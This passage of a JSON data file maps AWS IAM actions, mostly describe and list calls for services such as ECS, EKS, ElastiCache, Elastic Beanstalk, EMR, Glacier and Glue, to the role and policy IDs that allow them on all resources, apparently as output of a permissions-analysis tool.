null}}}}}}}},"ecs:listServices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:listTaskDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ecs:listTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:describeCluster": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:describeFargateProfile": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:describeNodegroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:describeUpdate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:listClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:listFargateProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:listNodegroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"eks:listUpdates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeCacheClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeCacheEngineVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeCacheParameterGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeCacheParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeCacheSecurityGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeCacheSubnetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeEngineDefaultParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeReplicationGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeReservedCacheNodes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeReservedCacheNodesOfferings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:describeSnapshots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:listAllowedNodeTypeModifications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticache:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:checkDNSAvailability": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeApplicationVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeApplications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeConfigurationOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeConfigurationSettings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeEnvironmentHealth": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeEnvironmentManagedActionHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeEnvironmentManagedActions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeEnvironmentResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeEnvironments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describeInstancesHealth": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:describePlatformVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:listAvailableSolutionStacks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:listPlatformVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticbeanstalk:validateConfigurationSettings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:describeAccessPoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:describeFileSystemPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:describeFileSystems": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:describeLifecycleConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:describeMountTargetSecurityGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:describeMountTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:describeTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticfilesystem:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:DescribeAccountLimits": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"elasticloadbalancing:DescribeInstanceHealth": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"elasticloadbalancing:DescribeLoadBalancerAttributes": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"elasticloadbalancing:DescribeLoadBalancerPolicies": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"elasticloadbalancing:DescribeLoadBalancerPolicyTypes": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"elasticloadbalancing:DescribeLoadBalancers": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"elasticloadbalancing:describeInstanceHealth": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeListenerCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeListeners": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeLoadBalancerAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeLoadBalancerPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeLoadBalancerPolicyTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeLoadBalancers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeSSLPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeTargetGroupAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeTargetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticloadbalancing:describeTargetHealth": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:Describe*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"elasticmapreduce:ListBootstrapActions": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"elasticmapreduce:ListClusters": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"elasticmapreduce:ListInstanceGroups": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}},"AROAIH747R37LKSEOZ2MA": {"Resource": {"*": {"policies": {"ANPAJSVXG6QHPE6VHDZ4Q": {"condition": null}}}}}}}},"elasticmapreduce:ListInstances": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"elasticmapreduce:ListSteps": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"elasticmapreduce:ModifyInstanceGroups": {"roles": {"Allow": {"AROAIH747R37LKSEOZ2MA": {"Resource": {"*": {"policies": {"ANPAJSVXG6QHPE6VHDZ4Q": {"condition": null}}}}}}}},"elasticmapreduce:describeCluster": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:describeSecurityConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:describeStep": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:listBootstrapActions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:listClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:listInstanceGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:listInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:listSecurityConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elasticmapreduce:listSteps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elastictranscoder:listJobsByPipeline": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elastictranscoder:listJobsByStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elastictranscoder:listPipelines": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elastictranscoder:listPresets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elastictranscoder:readPipeline": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"elastictranscoder:readPreset": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"es:describeElasticsearchDomain": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"es:describeElasticsearchDomainConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"es:describeElasticsearchDomains": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"es:listDomainNames": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"es:listTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"events:describeEventBus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"events:describeRule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"events:listRuleNamesByTarget": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"events:listRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"events:listTargetsByRule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"events:testEventPattern": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"firehose:describeDeliveryStream": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"firehose:listDeliveryStreams": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:getAdminAccount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:getComplianceDetail": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:getNotificationChannel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:getPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:getProtectionStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:listComplianceStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:listMemberAccounts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fms:listPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:describeDataset": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:describeDatasetGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:describeDatasetImportJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:describeForecast": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:describeForecastExportJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:describePredictor": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:getAccuracyMetrics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:listDatasetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:listDatasetImportJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:listDatasets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:listForecastExportJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:listForecasts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"forecast:listPredictors": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fsx:describeBackups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fsx:describeFileSystems": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"fsx:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:describeJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:describeVault": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:getDataRetrievalPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:getVaultAccessPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:getVaultLock": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:getVaultNotifications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:listJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:listTagsForVault": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glacier:listVaults": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"globalaccelerator:describeAccelerator": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"globalaccelerator:describeAcceleratorAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"globalaccelerator:describeEndpointGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"globalaccelerator:describeListener": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"globalaccelerator:listAccelerators": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"globalaccelerator:listEndpointGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"globalaccelerator:listListeners": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:BatchCreatePartition": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:BatchDeletePartition": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:BatchGetPartition": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:CreateDatabase": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:CreatePartition": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:CreateTable": {"roles": {"Allow": 